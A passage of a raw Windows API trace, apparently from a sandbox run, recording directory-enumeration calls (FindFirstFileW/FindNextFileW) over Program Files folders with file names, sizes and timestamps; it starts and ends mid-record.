cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfddedd5, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbfddedd5, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabimp.dll", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf9da906, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf9da906, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfa86dfb0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabmig.exe", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc2062a1d, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc2062a1d, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfbe97cf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc2062a1d, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc2062a1d, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfbe97cf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 0 [0058.303] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe1ab6be0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1ab6be0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0058.304] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe1b29000, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1b29000, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0058.304] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0058.304] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.305] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.306] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.306] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.306] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.306] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe.mui", cAlternateFileName="")) returned 1 [0058.306] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll.mui", cAlternateFileName="")) returned 1 [0058.306] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 1 [0058.306] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 0 [0058.306] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.307] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea0f40f, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8ea0f40f, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x85cc42cd, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x16f18, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe", cAlternateFileName="")) returned 1 [0058.307] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1054327, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1054327, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1184e2a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x25e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingEngine.dll", cAlternateFileName="")) returned 1 [0058.307] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb102e1c7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb102e1c7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1054327, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll", cAlternateFileName="")) returned 1 [0058.307] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b623846, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8b623846, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43a82ff0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoBase.dll", cAlternateFileName="")) returned 1 [0058.307] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb121d3ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb121d3ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb13c02ce, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1a5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 1 [0058.307] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb121d3ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb121d3ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb13c02ce, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1a5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 0 [0058.307] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.307] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe28fefe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe28fefe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0058.307] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe28fefe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe28fefe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.308] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe28fefe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe28fefe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.308] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fb67cb0, ftCreationTime.dwHighDateTime=0x1d5615d, ftLastAccessTime.dwLowDateTime=0xd8392270, ftLastAccessTime.dwHighDateTime=0x1d5ac28, ftLastWriteTime.dwLowDateTime=0xd8392270, ftLastWriteTime.dwHighDateTime=0x1d5ac28, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mxslipstream.exe", cAlternateFileName="MXSLIP~1.EXE")) returned 1 [0058.308] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa93f44c2, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa93f44c2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa93f44c2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0058.308] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e4e2220, ftCreationTime.dwHighDateTime=0x1d5d376, ftLastAccessTime.dwLowDateTime=0x7d9a15b0, ftLastAccessTime.dwHighDateTime=0x1d5c7f6, ftLastWriteTime.dwLowDateTime=0x7d9a15b0, ftLastWriteTime.dwHighDateTime=0x1d5c7f6, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sufficiently_awarded.exe", cAlternateFileName="SUFFIC~1.EXE")) returned 1 [0058.308] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c341860, ftCreationTime.dwHighDateTime=0x1d5b517, ftLastAccessTime.dwLowDateTime=0x98803330, ftLastAccessTime.dwHighDateTime=0x1d56ea7, ftLastWriteTime.dwLowDateTime=0x98803330, ftLastWriteTime.dwHighDateTime=0x1d56ea7, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="thunderbird.exe", cAlternateFileName="THUNDE~1.EXE")) returned 1 [0058.308] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c341860, ftCreationTime.dwHighDateTime=0x1d5b517, ftLastAccessTime.dwLowDateTime=0x98803330, ftLastAccessTime.dwHighDateTime=0x1d56ea7, ftLastWriteTime.dwLowDateTime=0x98803330, ftLastWriteTime.dwHighDateTime=0x1d56ea7, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="thunderbird.exe", cAlternateFileName="THUNDE~1.EXE")) returned 0 [0058.308] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.308] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xde0650e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xde0650e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0058.308] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xde0650e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xde0650e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0058.308] FindClose (in: hFindFile=0x6946c8 | out: hFindFile=0x6946c8) returned 1 [0058.309] FindNextFileW (in: hFindFile=0x694688, lpFindFileData=0x18f8f4 | out: lpFindFileData=0x18f8f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0058.309] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6946c8 [0058.309] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.309] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe1ab6be0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1ab6be0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0058.309] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe1ab6be0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1ab6be0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.309] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe1ab6be0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1ab6be0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.310] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79dc8ba0, ftCreationTime.dwHighDateTime=0x1d5c48c, ftLastAccessTime.dwLowDateTime=0xbbb3e4e0, ftLastAccessTime.dwHighDateTime=0x1d5639a, ftLastWriteTime.dwLowDateTime=0xbbb3e4e0, ftLastWriteTime.dwHighDateTime=0x1d5639a, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accupos.exe", cAlternateFileName="")) returned 1 [0058.310] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ffa80, ftCreationTime.dwHighDateTime=0x1d57842, ftLastAccessTime.dwLowDateTime=0xf5c40420, ftLastAccessTime.dwHighDateTime=0x1d5ceee, ftLastWriteTime.dwLowDateTime=0xf5c40420, ftLastWriteTime.dwHighDateTime=0x1d5ceee, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="centralcreditcard.exe", cAlternateFileName="CENTRA~1.EXE")) returned 1 [0058.310] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 1 [0058.310] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.310] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.311] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268, dwReserved0=0x0, dwReserved1=0x0, cFileName="Benioku.htm", cAlternateFileName="")) returned 1 [0058.311] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Berime.htm", cAlternateFileName="")) returned 1 [0058.311] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Esl", cAlternateFileName="")) returned 1 [0058.311] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*", 